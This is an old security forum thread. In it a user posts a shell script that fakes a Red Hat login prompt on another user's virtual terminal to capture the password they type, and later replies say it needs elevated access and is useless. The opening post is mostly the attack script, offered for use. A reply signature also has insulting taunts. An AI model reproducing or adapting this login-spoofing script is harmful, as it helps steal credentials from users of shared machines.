-
December 3rd, 2001, 04:18 AM
#1
Junior Member
tty hacking (no.. seriously)
You might remember my last thread about tty hacking (http://www.antionline.com/showthread...hreadid=119753). It turned out that didnt work, -lol-. I got really frustrated because many dismissed it as impossible.
There is no way to read back what the other person is typing unless you are the root user and have installed software specifically for that purpose
. aghh! So i hacked around some more because i knew that it worked and i just came up with a foolproof (no pun intended) method. Here's the script (attacker at tty1, victim at tty2):
#this cat is the big moma:
cat /dev/tty2 >/dev/tty1&
CATPID="$!"
echo -ne >/dev/tty2 #misc commands that dont return anything
true >/dev/tty2
false >/dev/tty2
locate dfdsfds >/dev/tty2
locate otherHw >/dev/tty2
#heres the meat:
clear >/dev/tty2
echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >/dev/tty2
echo -ne 'Kernel 2.4.2-2 on an i686\n' >/dev/tty2
echo -ne '\nlocalhost login: ' >/dev/tty2
sleep 5
#redraw the screen; bash at tty2 doesnt have a clue what is #going on, so it thinks $USER that the guy at tty2 entered is a #command:
clear >/dev/tty2
echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >/dev/tty2
echo -ne 'Kernel 2.4.2-2 on an i686\n\n' >/dev/tty2
echo -ne "localhost login: $USER\n" >/dev/tty2
echo -ne 'Password: '>/dev/tty2
#the stuff entered after password is the only thing thats #redirected
sleep 5 #give him time to enter his ps
kill -TERM $CATPID #so nothing else gets redirected
Now, 'foolproof' meaning you will get text back after the user enters his username (for some reason, after the cat and misc commands are excecuted, the user at tty2 must enter a string followed by enter before text gets redirected to tty1; and thats just in time for the ps to be redirected!). Now this script is extremely crappy so dont feel stupid asking if you dont know why it's doing what it does. If i learn real scripting ill make a better one and put it on here. Cheers
-Ryan
-
December 3rd, 2001, 05:05 PM
#2
Great idea, however you need root access for this to work, and at that point you could just change the password....
[chsh@comp chsh]$ cat /dev/tty2
cat: /dev/tty2: Permission denied
[chsh@comp chsh]$ su root
Password:
[root@comp chsh]# cat /dev/tty2
<I CTRL+C'ed to cancel out after seeing no output>
[root@comp chsh]#
Chris Shepherd
The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
\"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
Is your whole family retarded, or did they just catch it from you?
-
December 3rd, 2001, 06:23 PM
#3
Junior Member
Actually, you need to be the same user as the guy on tty2, or be in the group tty (i believe). But your sorta right that the hack is useless.
-
December 4th, 2001, 06:18 AM
#4
Originally posted by ryannh@prodigy.
Actually, you need to be the same user as the guy on tty2, or be in the group tty (i believe). But your sorta right that the hack is useless.
Right, but the idea here is to get rid of the login prompt and replace it with a fake. Only root can monitor the output of non-logged in ttys...
At any rate, it IS useless.
Chris Shepherd
The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
\"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
Is your whole family retarded, or did they just catch it from you?
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|